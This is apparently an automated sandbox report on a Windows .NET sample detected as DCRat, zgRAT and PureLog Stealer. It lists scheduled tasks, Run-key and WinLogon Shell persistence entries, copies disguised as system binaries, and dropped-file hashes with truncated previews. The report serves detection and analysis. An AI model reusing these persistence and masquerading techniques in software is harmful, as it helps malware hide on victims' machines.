Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	fdsN8iw6WG.exe renamed because original name is a hash value
Original Sample Name:	6fb0f1b7e1e962c770ef34e605d1c4ce.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@49/66@0/0
EGA Information:	Successful, ratio: 8.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, 703648cm.newnyash.top, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RuntimeBroker.exe, PID 6536 because it is empty
Execution Graph export aborted for target dEhCbXEAIUCUplvbdoWVtmGx.exe, PID 3652 because it is empty
Execution Graph export aborted for target dEhCbXEAIUCUplvbdoWVtmGx.exe, PID 5668 because it is empty
Execution Graph export aborted for target dEhCbXEAIUCUplvbdoWVtmGx.exe, PID 6628 because it is empty
Execution Graph export aborted for target dEhCbXEAIUCUplvbdoWVtmGx.exe, PID 7840 because it is empty
Execution Graph export aborted for target fdsN8iw6WG.exe, PID 1292 because it is empty
Execution Graph export aborted for target fdsN8iw6WG.exe, PID 5652 because it is empty
Execution Graph export aborted for target fdsN8iw6WG.exe, PID 5748 because it is empty
Execution Graph export aborted for target sihost.exe, PID 1672 because it is empty
Execution Graph export aborted for target sihost.exe, PID 5808 because it is empty
Execution Graph export aborted for target sihost.exe, PID 7880 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: fdsN8iw6WG.exe

Simulations

Behavior and APIs

Time	Type	Description
11:16:08	API Interceptor	7816x Sleep call for process: powershell.exe modified
17:15:59	Task Scheduler	Run new task: sihost path: "C:\Program Files\Microsoft\sihost.exe"
17:15:59	Task Scheduler	Run new task: sihosts path: "C:\Program Files\Microsoft\sihost.exe"
17:16:01	Task Scheduler	Run new task: dEhCbXEAIUCUplvbdoWVtmGxd path: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:16:03	Task Scheduler	Run new task: dEhCbXEAIUCUplvbdoWVtmGx path: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:16:03	Task Scheduler	Run new task: fdsN8iw6WG path: "C:\Users\user\Desktop\fdsN8iw6WG.exe"
17:16:04	Task Scheduler	Run new task: fdsN8iw6WGf path: "C:\Users\user\Desktop\fdsN8iw6WG.exe"
17:16:04	Task Scheduler	Run new task: RuntimeBroker path: "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:16:04	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:16:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Microsoft\sihost.exe"
17:16:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:16:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:16:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG "C:\Users\user\Desktop\fdsN8iw6WG.exe"
17:16:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Microsoft\sihost.exe"
17:16:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:16:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:17:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG "C:\Users\user\Desktop\fdsN8iw6WG.exe"
17:17:14	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Microsoft\sihost.exe"
17:17:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dEhCbXEAIUCUplvbdoWVtmGx "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:17:33	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:17:42	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fdsN8iw6WG "C:\Users\user\Desktop\fdsN8iw6WG.exe"
17:18:00	Autostart	Run: WinLogon Shell "C:\Program Files\Microsoft\sihost.exe"
17:18:09	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:18:18	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
17:18:27	Autostart	Run: WinLogon Shell "C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe"
17:18:36	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\fdsN8iw6WG.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\FMuYuXzk.log	Q13mrh42kO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	84JufgBTrA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kIdT4m0aa4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	BN57miasVe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YhyZwI1Upd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	K61NUunFJv.exe	Get hash	malicious	DCRat	Browse
	webWin.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	W1nner client.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XpADYjOsY5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SjA6nVF1ey.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.8916302610992752
Encrypted:	false
SSDEEP:	48:6gmtt6xZ8RxeOAkFJOcV4MKe28dmdKbLvqBHHuulB+hnqXSfbNtm:WVxvxVx95Lvk5TkZzNt
MD5:	F7CE11176E18AC54D1C8772F000066A5
SHA1:	6C2950FB7BE49C7A686CEDB3EF6F5DA8F111ACC2
SHA-256:	18E75A387E46A9B2299F1FEB172A0313E1A9ECBDD4111169D8A98FFB492D9E40
SHA-512:	1C264A30E3A9D11400F6E5A26E0A8C3B9004007C7A83C30E3CD3ACC01FE78EB14C50243A38C5D4D2830C1960A552EF1BC4DAE3F67EED81BCB214DE67D71457FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................D'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!................................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Program Files\Microsoft\66fc9ff0ee96c2

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with very long lines (332), with no line terminators
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.809679611142402
Encrypted:	false
SSDEEP:	6:Le3X3vywmwGKMwGIeKGJLgMbWWbAliBdvbwNqGd9y2zHLQso:CXv4wGKMw2dV3dAli/29E
MD5:	98DD09FFCED5681175FB3FC42F8D1F7B
SHA1:	4B5682E1329F7EA8A7D235400B6D648F9B5E4511
SHA-256:	FA23CDAA2CD3756F0C4A06CFE5B0339AE3D2F3D023E38803D406AAC1E3435C96
SHA-512:	89BB555014987215831DA28FDA728F07C34E257F2250F05650084E8DDE019F4C25DA3E3ECD7E587FF9F2C94B46660D2DAB5B76BD62DACE54DE1E6FD373E55408
Malicious:	false
Preview:	BCJCU3cesoDcCKlZ9eRs2RHC625fKm9deqz8z4JVRNaF2AtEt9Ip0fbu4HGc86UFpk7WUnjFU5bo0CK5I1wLdTm9OFEsxrXV3UZSCXtGZDV5Ew416LTGJJmV77IPi1RmiGvfn22vIqva8r5bLNwmXQLtsDUFPdhivsX8BZOESh8cXLXQBqEVEoOR4CwjhxgoJNoPT7aw9sUzSsWhqEDiZLdHdGD8nogeBUTJhH6EPRWWUZ9LpO3dt7O7uhwN4bJULzy7ZMAiI9SHzGwEH1TYuDuDGVZ9VsKyIBKekBwcOVUuoGInurGCIukIEu1DxAMaze9x5RdFE0JZ

C:\Program Files\Microsoft\sihost.exe

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2033664
Entropy (8bit):	7.574057459515473
Encrypted:	false
SSDEEP:	49152:t6Hwdqjo3Qo8D/30xTAprHEgLUabY1+oiPE:tHqQk/30tAVHLLLb6i
MD5:	6FB0F1B7E1E962C770EF34E605D1C4CE
SHA1:	A314D67A1383BA7042B9F5F1D513F4D9177DFF35
SHA-256:	32058AA91A7E956AE9B48F8EF08ED82C35063D4443D018369C45822DA3C9BA03
SHA-512:	2E74E56C7AEBBE4B6BDFD6F96DA72DB8C8B017FF1995151204B7CDDB09745A7A5B2C26C35B56E33FC32AE4D5373C197967AE5FF65EFD9809F520FBD55D1F3AE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\sihost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......D....................=..#........................................0..........(.... ........8........E........N...M...)...8....(.... ....~....{u...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{h...9....& ....8y......0.......... ........8........E....J.......!...v.......8E......... ....8....r...ps....z~....:.... ....~....{....:....& ....8........~....(d...~....(h... ....?.... ....8q...~....(\... .... .... ....s....~....(`....... ....~....{....91..

C:\Program Files\Microsoft\sihost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Portable Devices\9e0136ccaf7772

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with very long lines (915), with no line terminators
Category:	dropped
Size (bytes):	915
Entropy (8bit):	5.898927576820621
Encrypted:	false
SSDEEP:	24:M2tVfgSNAzmH6zbOOui+C4YFzRbN/qcGUNXXgn:vtV6zo6zbPui+iTSFUen
MD5:	F661028934B156408A4CBFD3629C5139
SHA1:	D4F9E368343D04385F071553BEBF70D59CC2356D
SHA-256:	F41B51916E0ECF5BA042D1554D9ABE1C79A3418FC8A25918389D301CFFF06CAD
SHA-512:	B80F6DE01248FD1334432576AB1488B4A26E41BEFF72ABF505F605EC2E41E1D371CE0555F472B972F1AA4FF34ABB26BD2E263FA58918D9BC12967AAE45EF7B35
Malicious:	false
Preview:	12c6idGMBbACHbbPV47tpMTrEszr8wHB2tYhTBjiNCrbxz4SuIpy0QPpiv20oYNOU8KXD35UVYgme24Oyh70HSLlet9iIt4yzdHypgP1MVdbumKq1oBGbXHBwj3T4XLmdrxBuFiRSFnwzt11iSqerxXbVGBGn57yJ07CzJ6wFtyWtVLDrBvlrr4qUVpnDcoWIym9wzCZW4Y78ArA58YmKVHc5RrddSsnFcN4sMR28VPwS7rUopsEDBMwrKDeHj6ELv2gwwRsrgozGVK8jXzxjnjDQbNiIwuYYLlgELh1YAXhXXqV9E4uuJehMyQVisj4vPa5tn4Y08YjQBp2u1iE1AoPqDUP4LSqacvI6vmWKg4wu5RKJXkrJfDvlKOqSodopsJxQh59PM3VG1euwKGhklg4ZAgvg5DgCPGCwd4lbkb7mrptqe4Ih6EELOYPAJdTIWT0vc8SPeF9JjRrVxFCB58FKB1hEolRHHyPYy8Nfl2C1E5l7r4NEbRMXNqtlaNl3x2CuBSgy1gaC6NGGPkXuXNpzm1KIPmEXRIEL205ZXYM41JbAjmV000fjMMIJHYjPbCvxJ4NYo7W9Bu7caKimQOgame9qrwR9y6dyYo0pZ7M3egicOqt6z79NgVKo5hq2pXLERJDvT3NTCn5G5hbBCVJ07QSCeMt1QUNGVdKFm7n6upK2ZDtYFpzUOUHB0ARHJVCsazvcWWYErNGSFZnacVwle22BWJOmqfwZmcckSQBtRumANz5bX0oyibNh6uFMHwYMarpm7DIMTCTuP1xhOxO0080KP4niLylfWakgJSeUscegIcSF6i8UhhVc1eXCajBebyYzRRX5S4IYdUCwmilmzQ7yEIpp4b4Ib9ETEcypKDBmZ68gbka18YoK1juJlsA1A97ePtsJu5cwOV

C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2033664
Entropy (8bit):	7.574057459515473
Encrypted:	false
SSDEEP:	49152:t6Hwdqjo3Qo8D/30xTAprHEgLUabY1+oiPE:tHqQk/30tAVHLLLb6i
MD5:	6FB0F1B7E1E962C770EF34E605D1C4CE
SHA1:	A314D67A1383BA7042B9F5F1D513F4D9177DFF35
SHA-256:	32058AA91A7E956AE9B48F8EF08ED82C35063D4443D018369C45822DA3C9BA03
SHA-512:	2E74E56C7AEBBE4B6BDFD6F96DA72DB8C8B017FF1995151204B7CDDB09745A7A5B2C26C35B56E33FC32AE4D5373C197967AE5FF65EFD9809F520FBD55D1F3AE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......D....................=..#........................................0..........(.... ........8........E........N...M...)...8....(.... ....~....{u...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{h...9....& ....8y......0.......... ........8........E....J.......!...v.......8E......... ....8....r...ps....z~....:.... ....~....{....:....& ....8........~....(d...~....(h... ....?.... ....8q...~....(\... .... .... ....s....~....(`....... ....~....{....91..

C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Sidebar\Shared Gadgets\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with very long lines (465), with no line terminators
Category:	dropped
Size (bytes):	465
Entropy (8bit):	5.870784889188346
Encrypted:	false
SSDEEP:	12:zldLqgWuHDL5wjFf0wJo0/TSdHVdHDMD+KQCA9YZk1XH1nM:zlCujLCnx/udED+KQClZYC
MD5:	F641C12B7583D51528BEF11888665E17
SHA1:	7340A4A8E8031174BF0F197C0558427697E2E667
SHA-256:	95246DD88249A91E8500109882BB924BE7BAE3D79914D3BBD320A4C250D72F9F
SHA-512:	D929F1FA47679990E00D5C0E61410BD3B1E7B73332E1CA2B2873DE2FC6269AC7FC4BEB5A57788C83C46864B11808CD141EBD8D65941525ED7481CCC4513779E0
Malicious:	false
Preview:	FGcHZwA25Uvq9d13PERruCkhzH5YhYB0opn1IbzFHkn0EeIpTh4PmxsCg4RS0lVgT5CTzAuyPLkKZtdV9QF9ewO07lUOJhPfOGhJcyzSwFAbNinxb5TkgVChqLWOpgor5E5SMT3KawMYvwnZ7hwNOp92EAcQcknQbSfImUkHCIJtJnv4i6QHtadQFDOL1nrzI67dRfwn6oLFfPtaOirfUggAzPCjFZQZbUlNqRmDKnKFPXu0Ty7S5LfmZ7oBcMhhYwoLogt65oVqVbubfMPRb7dPy8xtnlk7FmrdsiMxFAXQzyR8MMgQ7QGaSYWps9TUEYlttRs69cMbkNZArzhaETAygQLTLgEFqCMbNiO4dkQeEo0E9W83c2PuXwMcGYudYHuhB8xJln7eDgu2aGUziLmyxbDaVvxEzxF73SDAjyRz5vr1CUCAE55Ne6uj4Wx0z2oPaw8HCUPt3x2Bt

C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2033664
Entropy (8bit):	7.574057459515473
Encrypted:	false
SSDEEP:	49152:t6Hwdqjo3Qo8D/30xTAprHEgLUabY1+oiPE:tHqQk/30tAVHLLLb6i
MD5:	6FB0F1B7E1E962C770EF34E605D1C4CE
SHA1:	A314D67A1383BA7042B9F5F1D513F4D9177DFF35
SHA-256:	32058AA91A7E956AE9B48F8EF08ED82C35063D4443D018369C45822DA3C9BA03
SHA-512:	2E74E56C7AEBBE4B6BDFD6F96DA72DB8C8B017FF1995151204B7CDDB09745A7A5B2C26C35B56E33FC32AE4D5373C197967AE5FF65EFD9809F520FBD55D1F3AE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......D....................=..#........................................0..........(.... ........8........E........N...M...)...8....(.... ....~....{u...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{h...9....& ....8y......0.......... ........8........E....J.......!...v.......8E......... ....8....r...ps....z~....:.... ....~....{....:....& ....8........~....(d...~....(h... ....?.... ....8q...~....(\... .... .... ....s....~....(`....... ....~....{....91..

C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\9e0136ccaf7772

Download File

Process:	C:\Users\user\Desktop\fdsN8iw6WG.exe
File Type:	MGR bitmap, modern format, 8-bit aligned
Category:	dropped
Size (bytes):	565
Entropy (8bit):	5.893243602209044
Encrypted:	false
SSDEEP:	12:WlX59CKXaGRuaUy7Iex3uJmCKeKH0nNdnvl3vJLwYdJuH:WNbP3uab7r3hLeKH0P9vJLwmEH
MD5:	19454CBEB33E2FD7D7156A86946A35FB
SHA1:	B1F1E23F64E5AAF62D76186A0DB5965922DA1127
SHA-256:	3B72A73EC0544A98DAD68AA696726859D03EFD1DD56C6667BC91101E46A3792A
SHA-512:	AA92A69AAE6F0CEB9BE97F4275951EC7768CCFC7702C03DA7103DD69618561DE2A1DAE2266A2CBE824D5D5A310E459B44FB60ED0304EF2AD29685D18CFC80E99
Malicious:	false
Preview:	yzIkxYXPDXiaCx2pYcaFbRZiyWFlEaWC35oh33kJuZIVbp7Yra9JxDHhakvbTwLmBghGJVvf1RVBIEGIYq3naNOzxGHTIJz8OfT5I0OWpeRgsGYVdmCm2hMyRrTDNcXscWwmuKAhcg865sGrrvzfGMFqTeobhLIMHiEVUvkTmfKWjP2iklVcm1mPRFTPgi9QXvyXovW5Kg3kCtHDlG15zqkQ5yEOcUwDf48ybf3zPaRG7BMh8PoZrDarLibzqHc0t0FIvSmGMBqZZdS3lgQNqXVbdQn2DDIH7bWH6EwpmhMpWBSrPiOJ1OJWenoepuDJ2jc7HL7hullJKpEc85mfz9PsSAmSaR92eDwxiUkEkrZQn9MyjMftHhU3UtpGipHcltpG2R3oVi4Ij9ESxxsNvPu6s2dyodf4k7p4UF5RT1YjmMUUpXTv63qV8sY9yE91DAimUK7s1b341LTgiIJQKu8qRT5lr6dP1gfmnsAeak3fAwexZ1bp4srTB1UAPVB57oCUpq2zHp0j0dqfzHM0exUJzMlwXAPEj7hVtJIs8liP2HciLzKHI

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Download File

Process:	C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dEhCbXEAIUCUplvbdoWVtmGx.exe.log

Download File

Process:	C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
